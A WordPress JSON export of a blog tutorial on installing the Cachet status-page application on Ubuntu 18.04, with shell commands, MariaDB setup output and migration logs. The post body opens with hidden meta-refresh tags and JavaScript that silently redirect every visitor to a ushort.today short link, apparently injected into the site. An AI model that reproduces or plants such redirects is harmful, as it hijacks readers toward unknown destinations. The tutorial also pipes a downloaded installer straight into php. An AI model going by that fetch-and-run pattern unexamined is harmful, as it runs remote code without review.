{"id":2479,"date":"2022-01-01T20:31:11","date_gmt":"2022-01-01T20:31:11","guid":{"rendered":"https:\/\/aarviserversolutions.co.in\/wps\/?p=2479"},"modified":"2022-12-04T17:21:15","modified_gmt":"2022-12-04T17:21:15","slug":"cachet-install-on-ubuntu-18-04","status":"publish","type":"post","link":"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/","title":{"rendered":"Cachet install on Ubuntu 18.04"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/huiPfeX0r0\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.today\/huiPfeX0r0\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.today\/huiPfeX0r0\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.today\/huiPfeX0r0\";<\/script><br \/>\nHad an opportunity an Operation Notification open source application callled Cachet<\/p>\n<p>Below are the steps I used to successfully complete it and get it working<\/p>\n<p>SSH to Ubuntu server<\/p>\n<p>Set up right time on server using<\/p>\n<p>root@status:~# sudo dpkg-reconfigure tzdata<\/p>\n<p>Current default time zone: \u2018America\/Chicago\u2019<br \/>\nLocal time is now: \u00a0 \u00a0 \u00a0Mon Feb 22 10:48:44 CST 2021.<br \/>\nUniversal Time is now: \u00a0Mon Feb 22 16:48:44 UTC 2021.<\/p>\n<p>Next update the existing system using<\/p>\n<p>root@status:~# sudo apt update &amp;&amp; sudo apt upgrade -y<\/p>\n<p>Next install the PHP7 and mariadb using below command<\/p>\n<p>root@status:~# sudo apt install -y php php-cli php-fpm php-common php-xml php-gd php-zip php-mbstring php-mysql php-pgsql php-sqlite3 php-apcu<\/p>\n<p>Next start mysql in secure mode<\/p>\n<p>root@status:~# sudo mysql_secure_installation<\/p>\n<p>NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MariaDB<br \/>\nSERVERS IN PRODUCTION USE!\u00a0 PLEASE READ EACH STEP CAREFULLY!<\/p>\n<p>In order to log into MariaDB to secure it, we\u2019ll need the current<br \/>\npassword for the root user.\u00a0 If you\u2019ve just installed MariaDB, and<br \/>\nyou haven\u2019t set the root password yet, the password will be blank,<br \/>\nso you should just press enter here.<\/p>\n<p>Enter current password for root (enter for none):<br \/>\nOK, successfully used password, moving on\u2026<\/p>\n<p>Setting the root password ensures that nobody can log into the MariaDB<br \/>\nroot user without the proper authorisation.<\/p>\n<p>You already have a root password set, so you can safely answer \u2018n\u2019.<\/p>\n<p>Change the root password? [Y\/n] n<br \/>\n\u2026 skipping.<\/p>\n<p>By default, a MariaDB installation has an anonymous user, allowing anyone<br \/>\nto log into MariaDB without having to have a user account created for<br \/>\nthem.\u00a0 This is intended only for testing, and to make the installation<br \/>\ngo a bit smoother.\u00a0 You should remove them before moving into a<br \/>\nproduction environment.<\/p>\n<p>Remove anonymous users? [Y\/n] y<br \/>\n\u2026 Success!<\/p>\n<p>Normally, root should only be allowed to connect from \u2018localhost\u2019.\u00a0 This<br \/>\nensures that someone cannot guess at the root password from the network.<\/p>\n<p>Disallow root login remotely? [Y\/n] y<br \/>\n\u2026 Success!<\/p>\n<p>By default, MariaDB comes with a database named \u2018test\u2019 that anyone can<br \/>\naccess.\u00a0 This is also intended only for testing, and should be removed<br \/>\nbefore moving into a production environment.<\/p>\n<p>Remove test database and access to it? [Y\/n] y<br \/>\n\u2013 Dropping test database\u2026<br \/>\n\u2026 Success!<br \/>\n\u2013 Removing privileges on test database\u2026<br \/>\n\u2026 Success!<\/p>\n<p>Reloading the privilege tables will ensure that all changes made so far<br \/>\nwill take effect immediately.<\/p>\n<p>Reload privilege tables now? [Y\/n] y<br \/>\n\u2026 Success!<\/p>\n<p>Cleaning up\u2026<\/p>\n<p>All done!\u00a0 If you\u2019ve completed all of the above steps, your MariaDB<br \/>\ninstallation should now be secure.<\/p>\n<p>Next Create database and user and assign database to user<\/p>\n<p>root@status:~# mysql<br \/>\nWelcome to the MariaDB monitor.\u00a0 Commands end with ; or \\g.<br \/>\nYour MariaDB connection id is 47<br \/>\nServer version: 10.1.47-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04<\/p>\n<p>Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.<\/p>\n<p>Type \u2018help;\u2019 or \u2018\\h\u2019 for help. Type \u2018\\c\u2019 to clear the current input statement.<\/p>\n<p>MariaDB [(none)]&gt; CREATE DATABASE nocdb;<br \/>\nQuery OK, 1 row affected (0.00 sec)<\/p>\n<p>MariaDB [(none)]&gt; GRANT ALL ON nocdb.* to nocusr@localhost identified by \u201cyour-password\u201d;<br \/>\nQuery OK, 0 rows affected (0.00 sec)<\/p>\n<p>MariaDB [(none)]&gt; FLUSH PRIVILEGES;<br \/>\nQuery OK, 0 rows affected (0.00 sec)<\/p>\n<p>MariaDB [(none)]&gt; quit<br \/>\nBye<\/p>\n<p>&nbsp;<\/p>\n<p>Now install Nginx on server using below command<\/p>\n<p>root@status:~# sudo apt install -y nginx<\/p>\n<p>Now install git and curl on server using<\/p>\n<p>root@status:~# sudo apt install curl git<\/p>\n<p>Now install composer using<\/p>\n<p>root@status:~# curl -sS\u00a0<a href=\"https:\/\/getcomposer.org\/installer\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/getcomposer.org\/installer<\/a>\u00a0| sudo php \u2014 \u2013install-dir=\/usr\/local\/bin \u2013filename=composer<\/p>\n<p>Now create folder cachet using<\/p>\n<p>root@status:~# sudo mkdir -p \/var\/www\/cachet<\/p>\n<p>root@status:~# sudo chown -R user.user \/var\/www\/cachet<br \/>\nroot@status:~# cd \/var\/www\/cachet<\/p>\n<p>root@status:\/var\/www\/cachet# git clone -b 2.4 \u2013single-branch\u00a0<a href=\"https:\/\/github.com\/cachethq\/Cachet.git\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/cachethq\/Cachet.git<\/a>\u00a0.<\/p>\n<p>root@status:\/var\/www\/cachet# mv .env.example .env<\/p>\n<p>root@status:\/var\/www\/cachet# composer install \u2013no-dev -o<\/p>\n<p>root@status:\/var\/www\/cachet# php artisan cachet:install<\/p>\n<p>Do you want to configure Cachet before installing? (yes\/no) [no]:<br \/>\n&gt; yes<\/p>\n<p>Environment file already exists. Moving on.<br \/>\n**************************************<br \/>\n* \u00a0 \u00a0 Application In Production! \u00a0 \u00a0 *<br \/>\n**************************************<\/p>\n<p>Do you really wish to run this command? (yes\/no) [no]:<br \/>\n&gt; yes<\/p>\n<p>Application key set successfully.<\/p>\n<p>Which database driver do you want to use?:<br \/>\n[mysql ] MySQL<br \/>\n[pgsql ] PostgreSQL<br \/>\n[sqlite] SQLite<br \/>\n&gt; mysql<\/p>\n<p>What is the host of your mysql database?:<br \/>\n&gt; localhost<\/p>\n<p>Using \u2018localhost\u2019 will result in the usage of a local unix socket. Use 127.0.0.1 if you want to connect over TCP<\/p>\n<p>What is the name of the database that Cachet should use?:<br \/>\n&gt; nocdb<\/p>\n<p>What username should we connect with?:<br \/>\n&gt; nocusr<\/p>\n<p>What password should we connect with?:<br \/>\n&gt;<\/p>\n<p>Is your database listening on a non-standard port number? (yes\/no) [no]:<br \/>\n&gt; no<\/p>\n<p>Do you want to use a prefix on the table names? (yes\/no) [no]:<br \/>\n&gt; no<\/p>\n<p>+\u2014\u2014\u2014\u2014-+\u2014\u2014\u2014\u2014\u2014-+<br \/>\n| Setting \u00a0 \u00a0 | Value \u00a0 \u00a0 \u00a0 \u00a0 \u00a0|<br \/>\n+\u2014\u2014\u2014\u2014-+\u2014\u2014\u2014\u2014\u2014-+<br \/>\n| DB_DRIVER \u00a0 | mysql \u00a0 \u00a0 \u00a0 \u00a0 \u00a0|<br \/>\n| DB_HOST \u00a0 \u00a0 | localhost \u00a0 \u00a0 \u00a0|<br \/>\n| DB_DATABASE | nocdb \u00a0 \u00a0 \u00a0 |<br \/>\n| DB_USERNAME | nocusr \u00a0 \u00a0 \u00a0|<br \/>\n| DB_PASSWORD | xx345444$ |<br \/>\n| DB_PORT \u00a0 \u00a0 | 3306 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |<br \/>\n| DB_PREFIX \u00a0 | \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0|<br \/>\n+\u2014\u2014\u2014\u2014-+\u2014\u2014\u2014\u2014\u2014-+<\/p>\n<p>Are these settings correct? (yes\/no) [no]:<br \/>\n&gt; yes<\/p>\n<p>+\u2014\u2014\u2014\u2014\u2014-+\u2014\u2014-+<br \/>\n| Setting \u00a0 \u00a0 \u00a0 \u00a0| Value |<br \/>\n+\u2014\u2014\u2014\u2014\u2014-+\u2014\u2014-+<br \/>\n| CACHE_DRIVER \u00a0 | \u00a0 \u00a0 \u00a0 |<br \/>\n| SESSION_DRIVER | \u00a0 \u00a0 \u00a0 |<br \/>\n| QUEUE_DRIVER \u00a0 | \u00a0 \u00a0 \u00a0 |<br \/>\n+\u2014\u2014\u2014\u2014\u2014-+\u2014\u2014-+<\/p>\n<p>Which cache driver do you want to use?:<br \/>\n[apc \u00a0 \u00a0 \u00a0] APC(u)<br \/>\n[array \u00a0 \u00a0] Array<br \/>\n[database ] Database<br \/>\n[file \u00a0 \u00a0 ] File<br \/>\n[memcached] Memcached<br \/>\n[redis \u00a0 \u00a0] Redis<br \/>\n&gt; apc<\/p>\n<p>Which session driver do you want to use?:<br \/>\n[apc \u00a0 \u00a0 \u00a0] APC(u)<br \/>\n[array \u00a0 \u00a0] Array<br \/>\n[database ] Database<br \/>\n[file \u00a0 \u00a0 ] File<br \/>\n[memcached] Memcached<br \/>\n[redis \u00a0 \u00a0] Redis<br \/>\n&gt; apc<\/p>\n<p>Which queue driver do you want to use?:<br \/>\n[null \u00a0 \u00a0 \u00a0] None<br \/>\n[sync \u00a0 \u00a0 \u00a0] Synchronous<br \/>\n[database \u00a0] Database<br \/>\n[beanstalkd] Beanstalk<br \/>\n[sqs \u00a0 \u00a0 \u00a0 ] Amazon SQS<br \/>\n[redis \u00a0 \u00a0 ] Redis<br \/>\n&gt; database<\/p>\n<p>+\u2014\u2014\u2014\u2014\u2014-+\u2014\u2014\u2014-+<br \/>\n| Setting \u00a0 \u00a0 \u00a0 \u00a0| Value \u00a0 \u00a0|<br \/>\n+\u2014\u2014\u2014\u2014\u2014-+\u2014\u2014\u2014-+<br \/>\n| CACHE_DRIVER \u00a0 | apc \u00a0 \u00a0 \u00a0|<br \/>\n| SESSION_DRIVER | apc \u00a0 \u00a0 \u00a0|<br \/>\n| QUEUE_DRIVER \u00a0 | database |<br \/>\n+\u2014\u2014\u2014\u2014\u2014-+\u2014\u2014\u2014-+<\/p>\n<p>Are these settings correct? (yes\/no) [no]:<br \/>\n&gt; yes<\/p>\n<p>Do you want Cachet to send mail notifications? (yes\/no) [no]:<br \/>\n&gt; no<\/p>\n<p>Do you wish to use Cachet Beacon? (yes\/no) [no]:<br \/>\n&gt; no<\/p>\n<p>Do you wish to use Emoji? This requires a GitHub oAuth Token! (yes\/no) [no]:<br \/>\n&gt; no<\/p>\n<p>Do you want to create an admin user? (yes\/no) [no]:<br \/>\n&gt; yes<\/p>\n<p>Please enter your username:<br \/>\n&gt; your name<\/p>\n<p>Please enter your email:<br \/>\n&gt;\u00a0<a href=\"mailto:notification@kvchosting.net\" target=\"_blank\" rel=\"noreferrer noopener\">your email address<\/a><\/p>\n<p>Application key set successfully.<br \/>\nConfiguration cache cleared!<br \/>\nConfiguration cached successfully!<br \/>\nRoute cache cleared!<br \/>\nRoutes cached successfully!<br \/>\nCopied Directory [\/vendor\/laravel\/framework\/src\/Illuminate\/Foundation\/Exceptions\/views] To [\/resources\/views\/errors]<br \/>\nCopied Directory [\/vendor\/laravel\/framework\/src\/Illuminate\/Notifications\/resources\/views] To [\/resources\/views\/vendor\/notifications]<br \/>\nCopied Directory [\/vendor\/laravel\/framework\/src\/Illuminate\/Pagination\/resources\/views] To [\/resources\/views\/vendor\/pagination]<br \/>\nCopied Directory [\/vendor\/laravel\/framework\/src\/Illuminate\/Mail\/resources\/views] To [\/resources\/views\/vendor\/mail]<br \/>\nPublishing complete.<br \/>\nMigration table created successfully.<br \/>\nMigrating: 2015_01_05_201324_CreateComponentGroupsTable<br \/>\nMigrated: \u00a02015_01_05_201324_CreateComponentGroupsTable<br \/>\nMigrating: 2015_01_05_201444_CreateComponentsTable<br \/>\nMigrated: \u00a02015_01_05_201444_CreateComponentsTable<br \/>\nMigrating: 2015_01_05_202446_CreateIncidentTemplatesTable<br \/>\nMigrated: \u00a02015_01_05_202446_CreateIncidentTemplatesTable<br \/>\nMigrating: 2015_01_05_202609_CreateIncidentsTable<br \/>\nMigrated: \u00a02015_01_05_202609_CreateIncidentsTable<br \/>\nMigrating: 2015_01_05_202730_CreateMetricPointsTable<br \/>\nMigrated: \u00a02015_01_05_202730_CreateMetricPointsTable<br \/>\nMigrating: 2015_01_05_202826_CreateMetricsTable<br \/>\nMigrated: \u00a02015_01_05_202826_CreateMetricsTable<br \/>\nMigrating: 2015_01_05_203014_CreateSettingsTable<br \/>\nMigrated: \u00a02015_01_05_203014_CreateSettingsTable<br \/>\nMigrating: 2015_01_05_203235_CreateSubscribersTable<br \/>\nMigrated: \u00a02015_01_05_203235_CreateSubscribersTable<br \/>\nMigrating: 2015_01_05_203341_CreateUsersTable<br \/>\nMigrated: \u00a02015_01_05_203341_CreateUsersTable<br \/>\nMigrating: 2015_01_09_083419_AlterTableUsersAdd2FA<br \/>\nMigrated: \u00a02015_01_09_083419_AlterTableUsersAdd2FA<br \/>\nMigrating: 2015_01_16_083825_CreateTagsTable<br \/>\nMigrated: \u00a02015_01_16_083825_CreateTagsTable<br \/>\nMigrating: 2015_01_16_084030_CreateComponentTagTable<br \/>\nMigrated: \u00a02015_01_16_084030_CreateComponentTagTable<br \/>\nMigrating: 2015_02_28_214642_UpdateIncidentsAddScheduledAt<br \/>\nMigrated: \u00a02015_02_28_214642_UpdateIncidentsAddScheduledAt<br \/>\nMigrating: 2015_05_19_214534_AlterTableComponentGroupsAddOrder<br \/>\nMigrated: \u00a02015_05_19_214534_AlterTableComponentGroupsAddOrder<br \/>\nMigrating: 2015_05_20_073041_AlterTableIncidentsAddVisibileColumn<br \/>\nMigrated: \u00a02015_05_20_073041_AlterTableIncidentsAddVisibileColumn<br \/>\nMigrating: 2015_05_24_210939_create_jobs_table<br \/>\nMigrated: \u00a02015_05_24_210939_create_jobs_table<br \/>\nMigrating: 2015_05_24_210948_create_failed_jobs_table<br \/>\nMigrated: \u00a02015_05_24_210948_create_failed_jobs_table<br \/>\nMigrating: 2015_06_10_122216_AlterTableComponentsDropUserIdColumn<br \/>\nMigrated: \u00a02015_06_10_122216_AlterTableComponentsDropUserIdColumn<br \/>\nMigrating: 2015_06_10_122229_AlterTableIncidentsDropUserIdColumn<br \/>\nMigrated: \u00a02015_06_10_122229_AlterTableIncidentsDropUserIdColumn<br \/>\nMigrating: 2015_08_02_120436_AlterTableSubscribersRemoveDeletedAt<br \/>\nMigrated: \u00a02015_08_02_120436_AlterTableSubscribersRemoveDeletedAt<br \/>\nMigrating: 2015_08_13_214123_AlterTableMetricsAddDecimalPlacesColumn<br \/>\nMigrated: \u00a02015_08_13_214123_AlterTableMetricsAddDecimalPlacesColumn<br \/>\nMigrating: 2015_10_31_211944_CreateInvitesTable<br \/>\nMigrated: \u00a02015_10_31_211944_CreateInvitesTable<br \/>\nMigrating: 2015_11_03_211049_AlterTableComponentsAddEnabledColumn<br \/>\nMigrated: \u00a02015_11_03_211049_AlterTableComponentsAddEnabledColumn<br \/>\nMigrating: 2015_12_26_162258_AlterTableMetricsAddDefaultViewColumn<br \/>\nMigrated: \u00a02015_12_26_162258_AlterTableMetricsAddDefaultViewColumn<br \/>\nMigrating: 2016_01_09_141852_CreateSubscriptionsTable<br \/>\nMigrated: \u00a02016_01_09_141852_CreateSubscriptionsTable<br \/>\nMigrating: 2016_01_29_154937_AlterTableComponentGroupsAddCollapsedColumn<br \/>\nMigrated: \u00a02016_01_29_154937_AlterTableComponentGroupsAddCollapsedColumn<br \/>\nMigrating: 2016_02_18_085210_AlterTableMetricPointsChangeValueColumn<br \/>\nMigrated: \u00a02016_02_18_085210_AlterTableMetricPointsChangeValueColumn<br \/>\nMigrating: 2016_03_01_174858_AlterTableMetricPointsAddCounterColumn<br \/>\nMigrated: \u00a02016_03_01_174858_AlterTableMetricPointsAddCounterColumn<br \/>\nMigrating: 2016_03_08_125729_CreateIncidentUpdatesTable<br \/>\nMigrated: \u00a02016_03_08_125729_CreateIncidentUpdatesTable<br \/>\nMigrating: 2016_03_10_144613_AlterTableComponentGroupsMakeColumnInteger<br \/>\nMigrated: \u00a02016_03_10_144613_AlterTableComponentGroupsMakeColumnInteger<br \/>\nMigrating: 2016_04_05_142933_create_sessions_table<br \/>\nMigrated: \u00a02016_04_05_142933_create_sessions_table<br \/>\nMigrating: 2016_04_29_061916_AlterTableSubscribersAddGlobalColumn<br \/>\nMigrated: \u00a02016_04_29_061916_AlterTableSubscribersAddGlobalColumn<br \/>\nMigrating: 2016_06_02_075012_AlterTableMetricsAddOrderColumn<br \/>\nMigrated: \u00a02016_06_02_075012_AlterTableMetricsAddOrderColumn<br \/>\nMigrating: 2016_06_05_091615_create_cache_table<br \/>\nMigrated: \u00a02016_06_05_091615_create_cache_table<br \/>\nMigrating: 2016_07_25_052444_AlterTableComponentGroupsAddVisibleColumn<br \/>\nMigrated: \u00a02016_07_25_052444_AlterTableComponentGroupsAddVisibleColumn<br \/>\nMigrating: 2016_08_23_114610_AlterTableUsersAddWelcomedColumn<br \/>\nMigrated: \u00a02016_08_23_114610_AlterTableUsersAddWelcomedColumn<br \/>\nMigrating: 2016_09_04_100000_AlterTableIncidentsAddStickiedColumn<br \/>\nMigrated: \u00a02016_09_04_100000_AlterTableIncidentsAddStickiedColumn<br \/>\nMigrating: 2016_10_24_183415_AlterTableIncidentsAddOccurredAtColumn<br \/>\nMigrated: \u00a02016_10_24_183415_AlterTableIncidentsAddOccurredAtColumn<br \/>\nMigrating: 2016_10_30_174400_CreateSchedulesTable<br \/>\nMigrated: \u00a02016_10_30_174400_CreateSchedulesTable<br \/>\nMigrating: 2016_10_30_174410_CreateScheduleComponentsTable<br \/>\nMigrated: \u00a02016_10_30_174410_CreateScheduleComponentsTable<br \/>\nMigrating: 2016_10_30_182324_AlterTableIncidentsRemoveScheduledColumns<br \/>\nMigrated: \u00a02016_10_30_182324_AlterTableIncidentsRemoveScheduledColumns<br \/>\nMigrating: 2016_12_04_163502_AlterTableMetricsAddVisibleColumn<br \/>\nMigrated: \u00a02016_12_04_163502_AlterTableMetricsAddVisibleColumn<br \/>\nMigrating: 2016_12_05_185045_AlterTableComponentsAddMetaColumn<br \/>\nMigrated: \u00a02016_12_05_185045_AlterTableComponentsAddMetaColumn<br \/>\nMigrating: 2016_12_29_124643_AlterTableSubscribersAddPhoneNumberSlackColumns<br \/>\nMigrated: \u00a02016_12_29_124643_AlterTableSubscribersAddPhoneNumberSlackColumns<br \/>\nMigrating: 2016_12_29_155956_AlterTableComponentsMakeLinkNullable<br \/>\nMigrated: \u00a02016_12_29_155956_AlterTableComponentsMakeLinkNullable<br \/>\nMigrating: 2017_01_03_143916_create_notifications_table<br \/>\nMigrated: \u00a02017_01_03_143916_create_notifications_table<br \/>\nMigrating: 2017_02_03_222218_CreateActionsTable<br \/>\nMigrated: \u00a02017_02_03_222218_CreateActionsTable<br \/>\nMigrating: 2017_06_13_181049_CreateMetaTable<br \/>\nMigrated: \u00a02017_06_13_181049_CreateMetaTable<br \/>\nMigrating: 2017_07_18_214718_CreateIncidentComponents<br \/>\nMigrated: \u00a02017_07_18_214718_CreateIncidentComponents<br \/>\nMigrating: 2017_09_14_180434_AlterIncidentsAddUserId<br \/>\nMigrated: \u00a02017_09_14_180434_AlterIncidentsAddUserId<br \/>\nMigrating: 2018_04_02_163328_CreateTaggablesTable<br \/>\nMigrated: \u00a02018_04_02_163328_CreateTaggablesTable<br \/>\nMigrating: 2018_04_02_163658_MigrateComponentTagTable<br \/>\nMigrated: \u00a02018_04_02_163658_MigrateComponentTagTable<br \/>\nMigrating: 2018_06_14_201440_AlterSchedulesSoftDeletes<br \/>\nMigrated: \u00a02018_06_14_201440_AlterSchedulesSoftDeletes<br \/>\nMigrating: 2018_06_17_182507_AlterIncidentsAddNotifications<br \/>\nMigrated: \u00a02018_06_17_182507_AlterIncidentsAddNotifications<br \/>\nMigrating: 2019_12_12_131400_AlterJobsDropReserved<br \/>\nMigrated: \u00a02019_12_12_131400_AlterJobsDropReserved<br \/>\nDatabase seeding completed successfully.<br \/>\nClearing cache\u2026<br \/>\nApplication cache cleared!<br \/>\nCache cleared!<br \/>\nThe [public\/storage] directory has been linked.<br \/>\nCachet is installed \u26a1<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Had an opportunity an Operation Notification open source application callled Cachet Below are the steps I used to successfully complete it and get it working SSH to Ubuntu server Set up right time on server using root@status:~# sudo dpkg-reconfigure tzdata Current default time zone: \u2018America\/Chicago\u2019 Local time is now: \u00a0 \u00a0 \u00a0Mon Feb 22 10:48:44 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7535,"comment_status":"closed","ping_status":"closed","sticky":true,"template":"","format":"standard","meta":{"footnotes":""},"categories":[35,42],"tags":[],"class_list":["post-2479","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-linux","category-shell-script"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cachet install on Ubuntu 18.04 - Aarvi Server Solutions<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cachet install on Ubuntu 18.04 - Aarvi Server Solutions\" \/>\n<meta property=\"og:description\" content=\"Had an opportunity an Operation Notification open source application callled Cachet Below are the steps I used to successfully complete it and get it working SSH to Ubuntu server Set up right time on server using root@status:~# sudo dpkg-reconfigure tzdata Current default time zone: \u2018America\/Chicago\u2019 Local time is now: \u00a0 \u00a0 \u00a0Mon Feb 22 10:48:44 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/aarviserversolutions.co.in\/wps\/cachet-install-on-ubuntu-18-04\/\" \/>\n<meta property=\"og:site_name\" content=\"Aarvi Server Solutions\" \/>\n<meta property=\"article:published_time\" content=\"2022-01-01T20:31:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-04T17:21:15+00:00\" \/>\n<meta name=\"author\" content=\"Prasad Naik\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Prasad Naik\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/\"},\"author\":{\"name\":\"Prasad Naik\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#\\\/schema\\\/person\\\/c80edf3cd17550fb03e57e42f107261e\"},\"headline\":\"Cachet install on Ubuntu 18.04\",\"datePublished\":\"2022-01-01T20:31:11+00:00\",\"dateModified\":\"2022-12-04T17:21:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/\"},\"wordCount\":1348,\"publisher\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/cachet-install-on-ubuntu-18-04_2479.jpg\",\"articleSection\":[\"Linux\",\"Script\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/\",\"name\":\"Cachet install on Ubuntu 18.04 - Aarvi Server Solutions\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/cachet-install-on-ubuntu-18-04_2479.jpg\",\"datePublished\":\"2022-01-01T20:31:11+00:00\",\"dateModified\":\"2022-12-04T17:21:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/#primaryimage\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/cachet-install-on-ubuntu-18-04_2479.jpg\",\"contentUrl\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2025\\\/09\\\/cachet-install-on-ubuntu-18-04_2479.jpg\",\"width\":800,\"height\":600},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/cachet-install-on-ubuntu-18-04\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cachet install on Ubuntu 18.04\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#website\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/\",\"name\":\"Aarvi Server Solutions\",\"description\":\"cpanel server management\",\"publisher\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#organization\",\"name\":\"Aarvi Server Solutions\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/aarvi-logo-2.png\",\"contentUrl\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/aarvi-logo-2.png\",\"width\":1016,\"height\":264,\"caption\":\"Aarvi Server Solutions\"},\"image\":{\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/aarviserversolutions.co.in\\\/wps\\\/#\\\/schema\\\/person\\\/c80edf3cd17550fb03e57e42f107261e\",\"name\":\"Prasad 